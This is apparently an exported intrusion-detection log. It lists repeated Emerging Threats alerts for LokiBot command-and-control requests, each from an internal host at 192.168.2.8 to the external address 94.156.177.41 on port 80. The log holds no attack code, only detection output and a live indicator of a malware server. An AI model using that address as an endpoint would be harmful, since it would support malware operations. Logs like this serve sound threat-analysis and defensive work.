2025-01-11T01:44:06.794404+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.8	51587	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:23.762234+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:24.642872+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.938002+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.818252+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:27.703027+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.855418+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.739177+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:30.609312+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.824610+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:32.733349+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:33.590744+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.808586+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:35.673992+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:36.597333+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:37.453451+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:38.373443+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:39.300522+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:40.182347+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:41.051405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.904144+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.789215+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:43.880204+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.715443+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:45.597583+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:46.616967+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:47.494263+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:48.388017+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:49.285558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:50.165740+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:51.033454+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.929916+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:53.011005+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:54.019699+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.883072+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.733113+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:56.756990+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:57.657232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:58.531476+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:59.839528+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.718117+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:01.574531+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:02.677370+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:03.548607+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:04.445387+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:05.582800+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:06.451735+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:07.362946+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:08.501687+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:09.359941+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:10.258088+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:11.447670+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:12.357348+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:13.250209+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:14.455819+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:15.317903+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:16.169920+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:17.034256+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:18.008658+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.899257+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.776146+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:20.675015+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:21.529416+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:22.419117+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:23.300654+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:24.173563+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:25.031983+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.949805+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.814642+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:27.681023+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:28.609487+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:29.581279+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:30.500137+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:31.580940+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:32.450949+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:33.314839+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:34.659023+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:35.532934+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:36.403855+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:37.315630+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:38.226839+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:39.084674+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.967691+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.906466+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.803250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.794250+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:43.674930+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:44.614068+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:45.582363+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:46.438299+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:47.295907+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:48.196551+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:49.076139+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.953109+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.836273+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:51.718554+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:52.590087+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.748109+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:54.614974+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:55.488808+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:56.636237+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:57.548619+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:58.432809+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:59.294217+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:44:00.168919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:01.029999+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.911205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.788148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.775125+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:04.664084+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:05.575862+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:06.645085+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:07.690650+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:08.542955+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:09.524805+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:10.390018+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:11.267558+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:12.275424+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:13.186096+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:14.053421+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.935173+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.838515+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.721393+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:17.604119+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:18.481641+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:19.611694+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:20.466096+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:21.591884+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:22.440616+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:23.341846+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:24.227497+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:25.071196+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.895893+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.8	51587	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:42:23.762234+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:24.642872+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.938002+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.818252+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:27.703027+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.855418+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.739177+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:30.609312+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.824610+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:32.733349+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:33.590744+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.808586+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:35.673992+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:36.597333+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:37.453451+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49722	94.156.177.41	80	TCP
2025-01-11T01:42:38.373443+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49723	94.156.177.41	80	TCP
2025-01-11T01:42:39.300522+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49724	94.156.177.41	80	TCP
2025-01-11T01:42:40.182347+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49725	94.156.177.41	80	TCP
2025-01-11T01:42:41.051405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49726	94.156.177.41	80	TCP
2025-01-11T01:42:41.904144+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49727	94.156.177.41	80	TCP
2025-01-11T01:42:42.789215+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49728	94.156.177.41	80	TCP
2025-01-11T01:42:43.880204+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49729	94.156.177.41	80	TCP
2025-01-11T01:42:44.715443+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49730	94.156.177.41	80	TCP
2025-01-11T01:42:45.597583+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49731	94.156.177.41	80	TCP
2025-01-11T01:42:46.616967+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49732	94.156.177.41	80	TCP
2025-01-11T01:42:47.494263+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49733	94.156.177.41	80	TCP
2025-01-11T01:42:48.388017+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49734	94.156.177.41	80	TCP
2025-01-11T01:42:49.285558+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49735	94.156.177.41	80	TCP
2025-01-11T01:42:50.165740+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49736	94.156.177.41	80	TCP
2025-01-11T01:42:51.033454+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49737	94.156.177.41	80	TCP
2025-01-11T01:42:51.929916+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49738	94.156.177.41	80	TCP
2025-01-11T01:42:53.011005+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49739	94.156.177.41	80	TCP
2025-01-11T01:42:54.019699+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49740	94.156.177.41	80	TCP
2025-01-11T01:42:54.883072+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49741	94.156.177.41	80	TCP
2025-01-11T01:42:55.733113+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49742	94.156.177.41	80	TCP
2025-01-11T01:42:56.756990+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49743	94.156.177.41	80	TCP
2025-01-11T01:42:57.657232+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49744	94.156.177.41	80	TCP
2025-01-11T01:42:58.531476+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49745	94.156.177.41	80	TCP
2025-01-11T01:42:59.839528+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49746	94.156.177.41	80	TCP
2025-01-11T01:43:00.718117+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49747	94.156.177.41	80	TCP
2025-01-11T01:43:01.574531+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49748	94.156.177.41	80	TCP
2025-01-11T01:43:02.677370+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49749	94.156.177.41	80	TCP
2025-01-11T01:43:03.548607+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	49750	94.156.177.41	80	TCP
2025-01-11T01:43:04.445387+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:05.582800+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:06.451735+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:07.362946+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:08.501687+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:09.359941+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:10.258088+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:11.447670+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:12.357348+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:13.250209+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:14.455819+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:15.317903+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:16.169920+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:17.034256+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:18.008658+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.899257+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.776146+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:20.675015+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:21.529416+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:22.419117+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:23.300654+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:24.173563+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:25.031983+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.949805+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.814642+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:27.681023+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:28.609487+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:29.581279+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:30.500137+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:31.580940+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:32.450949+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:33.314839+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.8	51261	94.156.177.41	80	TCP
